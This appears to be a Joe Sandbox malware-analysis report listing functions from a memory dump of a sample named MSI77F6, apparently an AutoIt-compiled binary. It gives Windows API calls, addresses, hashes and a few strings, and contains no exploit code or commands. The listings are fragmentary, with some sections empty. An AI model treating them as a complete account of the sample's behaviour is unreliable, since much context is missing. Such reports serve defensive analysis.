                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X
                                        • API String ID: 774024439-3081909835
                                        • Opcode ID: aa0245dc079ef96cd7e19a790cfdcb308a0a47e05c97cbc5421516ded0fde9d2
                                        • Instruction ID: 9d632ccb342f558f858d6cfec1a1c1647a573ef1160248e262ba72af2c209564
                                        • Opcode Fuzzy Hash: aa0245dc079ef96cd7e19a790cfdcb308a0a47e05c97cbc5421516ded0fde9d2
                                        • Instruction Fuzzy Hash: D9C17231608341DFC724EF24C899E5AB7E4BF85350F40892DF899972A2DB78ED45CB92
                                        Function 007DE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                          • Part of subcall function 0078B58B: BeginPath.GDI32(?), ref: 0078B611
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DE9F2
                                        • LineTo.GDI32(00000000,00000003,?), ref: 007DEA06
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DEA14
                                        • LineTo.GDI32(00000000,00000000,?), ref: 007DEA24
                                        • EndPath.GDI32(00000000), ref: 007DEA34
                                        • StrokePath.GDI32(00000000), ref: 007DEA44
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 1cadc85b23c4fec3a09d6db51f2d4d7c7cd6d60ed7fbc279fd9eb2fbec34a087
                                        • Instruction ID: c72be6df4270d4639d00dd3d3d4c8b06c758394f8fb101a35b39a85b08841e96
                                        • Opcode Fuzzy Hash: 1cadc85b23c4fec3a09d6db51f2d4d7c7cd6d60ed7fbc279fd9eb2fbec34a087
                                        • Instruction Fuzzy Hash: 0111C57600014DBFEF129F90DC88EEA7FADFB08354F048022FA195A160DB759D55DBA4
                                        Function 007AEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 007AEFB6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 007AEFC7
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007AEFCE
                                        • ReleaseDC.USER32(00000000,00000000), ref: 007AEFD6
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007AEFED
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 007AEFFF
                                          • Part of subcall function 007AA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,007AA79D,00000000,00000000,?,007AAB73), ref: 007AB2CA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                        • String ID:
                                        • API String ID: 603618608-0
                                        • Opcode ID: e0d5ecc4e08a8924b2388bb3a25d5ade2a51cc6cc058393a5ab3201184ab475a
                                        • Instruction ID: f146d5bc16855dcaebe77dbe973d0f4797f4c00b21b50c39ff95e41c037317f3
                                        • Opcode Fuzzy Hash: e0d5ecc4e08a8924b2388bb3a25d5ade2a51cc6cc058393a5ab3201184ab475a
                                        • Instruction Fuzzy Hash: 61014475A00219BFEB109BA59C49B5EBFB9EB89751F008066FE04EB290D6749D01CB61
                                        Function 007987D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __init_pointers.LIBCMT ref: 007987D7
                                          • Part of subcall function 00791E5A: __initp_misc_winsig.LIBCMT ref: 00791E7E
                                          • Part of subcall function 00791E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00798BE1
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00798BF5
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00798C08
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00798C1B
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00798C2E
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00798C41
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00798C54
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00798C67
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00798C7A
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00798C8D
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00798CA0
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00798CB3
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00798CC6
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00798CD9
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00798CEC
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00798CFF
                                        • __mtinitlocks.LIBCMT ref: 007987DC
                                          • Part of subcall function 00798AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0082AC68,00000FA0,?,?,007987E1,00796AFA,008267D8,00000014), ref: 00798AD1
                                        • __mtterm.LIBCMT ref: 007987E5
                                          • Part of subcall function 0079884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007989CF
                                          • Part of subcall function 0079884D: _free.LIBCMT ref: 007989D6
                                          • Part of subcall function 0079884D: RtlDeleteCriticalSection.NTDLL(0082AC68), ref: 007989F8
                                        • __calloc_crt.LIBCMT ref: 0079880A
                                        • GetCurrentThreadId.KERNEL32 ref: 00798833
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 2942034483-0
                                        • Opcode ID: 6836fd3f194b4caffc49db583c439ded6160847c6c657912be4b2b4c0a75215b
                                        • Instruction ID: d6118cde004cf3518e82588ce57a16f71cdfdf57bbfb92e3fd9f22cc73d210da
                                        • Opcode Fuzzy Hash: 6836fd3f194b4caffc49db583c439ded6160847c6c657912be4b2b4c0a75215b
                                        • Instruction Fuzzy Hash: 58F09072129711DEEEF877B8BC0BA4A2AC0DF03730B654A2AF464D50E2FF2888414167
                                        Function 007BA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 1423608774-0
                                        • Opcode ID: d5eb9712ff14c52858a0457d4cc22d753cbdb9942fa4b42876980823cb90c51c
                                        • Instruction ID: 115df7936c94459d614eb61417e4de3f99ebcb152418a54f81bf373301ff24d8
                                        • Opcode Fuzzy Hash: d5eb9712ff14c52858a0457d4cc22d753cbdb9942fa4b42876980823cb90c51c
                                        • Instruction Fuzzy Hash: 48018632101211EBD7252B58ED48FFF77A6FF497017004529F50393061CB6CAC00CBA5
                                        Function 00771867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00771898
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007718A0
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007718AB
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007718B6
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007718BE
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007718C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: bf307a259d7fb0e1e33ba0cfd22ee77759bd81f3de65cb1a6ee5db9bea651a28
                                        • Instruction ID: 0aab72ce6830c0345730da894aa7a02592265549a5836d009194e9321c886e76
                                        • Opcode Fuzzy Hash: bf307a259d7fb0e1e33ba0cfd22ee77759bd81f3de65cb1a6ee5db9bea651a28
                                        • Instruction Fuzzy Hash: D7016CB0901B597DE3008F6A8C85B52FFB8FF15354F04411B915C87941C7F5A864CBE5
                                        Function 007B84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B8504
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B851A
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 007B8529
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8538
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8542
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8549
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: d921b132ee75c153abb699eae4fc3599549cf136ea5814f1b669978278217f20
                                        • Instruction ID: aa3b90032b4dd6f0eca6999cdaa2724225624c4fc2b4d51985519090c6e08126
                                        • Opcode Fuzzy Hash: d921b132ee75c153abb699eae4fc3599549cf136ea5814f1b669978278217f20
                                        • Instruction Fuzzy Hash: DAF01772240158BBE7315B629D0EEEF7B7DDFC6B55F014058FA05D1050ABA86E01C6B9
                                        Function 007BA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 007BA330
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007BA341
                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007BA34E
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007BA35B
                                          • Part of subcall function 007B9CCE: CloseHandle.KERNEL32(?,?,007BA368,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007B9CD8
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007BA36E
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007BA375
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: d99517befdea2e327e677dd64c3247897003a96e1eaf7f2bc5415b8c7e157eb6
                                        • Instruction ID: 0d280d90da0d78adc2d78e18a0d9bf32534756c1ffd70a29df946d42597e0b38
                                        • Opcode Fuzzy Hash: d99517befdea2e327e677dd64c3247897003a96e1eaf7f2bc5415b8c7e157eb6
                                        • Instruction Fuzzy Hash: 80F05E32141211EBD3212B68ED4CEEF7B7AFF8A302B004521F202920A1CBBD9C11DBA5
                                        Function 0077C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memmove.LIBCMT ref: 0077C419
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,007B6653,?,?,00000000), ref: 0077C495
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FileRead_memmove
                                        • String ID: Sf{
                                        • API String ID: 1325644223-1707814254
                                        • Opcode ID: 7327d4b828e428dd210cf1d06024ebb0540633dff6ce42b13b31f4eeba919f2e
                                        • Instruction ID: b8658f2e1a75176353e05512b011762dae7c8bee8584aa6b3f41c0ef2d2ec081
                                        • Opcode Fuzzy Hash: 7327d4b828e428dd210cf1d06024ebb0540633dff6ce42b13b31f4eeba919f2e
                                        • Instruction Fuzzy Hash: B4A1CD70A04649EFDF11CF66C884BADFBB0FF09340F14C199E8699A281D739E961DB91
                                        Function 0078D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 0077BBD9: _memmove.LIBCMT ref: 0077BC33
                                        • __swprintf.LIBCMT ref: 0078D98F
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0078D832
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: 83b5250fd095a545233f307ababab3c43ffc7c836f1b0bdf84399bf5d34d9cf1
                                        • Instruction ID: c268315692421a15e522eda91443be711c3867fefd9cd286a8f75281e64a9ca0
                                        • Opcode Fuzzy Hash: 83b5250fd095a545233f307ababab3c43ffc7c836f1b0bdf84399bf5d34d9cf1
                                        • Instruction Fuzzy Hash: F6914B71108241EFCB24FF25C889D6EB7A8FF89740F00491DF59A9B2A1DB68ED05CB52
                                        Function 007CB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007CB4A8
                                        • CharUpperBuffW.USER32(?,?), ref: 007CB5B7
                                        • VariantClear.OLEAUT32(?), ref: 007CB73A
                                          • Part of subcall function 007BA6F6: VariantInit.OLEAUT32(00000000), ref: 007BA736
                                          • Part of subcall function 007BA6F6: VariantCopy.OLEAUT32(?,?), ref: 007BA73F
                                          • Part of subcall function 007BA6F6: VariantClear.OLEAUT32(?), ref: 007BA74B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        • Opcode ID: 2ea3dced79d533ac605487ab44d01b6da7d20782fe412e2e0cdb93066e3d7ce1
                                        • Instruction ID: 29ffaa7d80bf8674ed0c8f98af952be678ee25da67be3708f9e9c662c43eb36e
                                        • Opcode Fuzzy Hash: 2ea3dced79d533ac605487ab44d01b6da7d20782fe412e2e0cdb93066e3d7ce1
                                        • Instruction Fuzzy Hash: 46915974608301DFCB10DF24D489E6AB7E4AF89750F14886EF88A9B352DB39E945CB52
                                        Function 007B1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007B10B8
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007B10EE
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007B10FF
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B1181
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: f134ae5af02833d6dea25149492d9d7e67db685e8d1553ccb266e5329c20174a
                                        • Instruction ID: b00d938ae6b41e708bfea246392be8ff931d96dc3198130f7d48a2f9ca34a098
                                        • Opcode Fuzzy Hash: f134ae5af02833d6dea25149492d9d7e67db685e8d1553ccb266e5329c20174a
                                        • Instruction Fuzzy Hash: E8413CB160020CEFDB15CF58CC94BEA7BAAEF45350B9480A9AA05DF205D7B9DD44CBA0
                                        Function 007B5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007B5A93
                                        • GetMenuItemInfoW.USER32 ref: 007B5AAF
                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007B5AF5
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008318F0,00000000), ref: 007B5B3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: abb495e5016848cbf9fd6e977ce68813ae6a0af275baefa80e7a5446019d20f0
                                        • Instruction ID: a48c0d7add039fd08b400eee1a2c4fc041970ecb2c9a43084910d4a22a763386
                                        • Opcode Fuzzy Hash: abb495e5016848cbf9fd6e977ce68813ae6a0af275baefa80e7a5446019d20f0
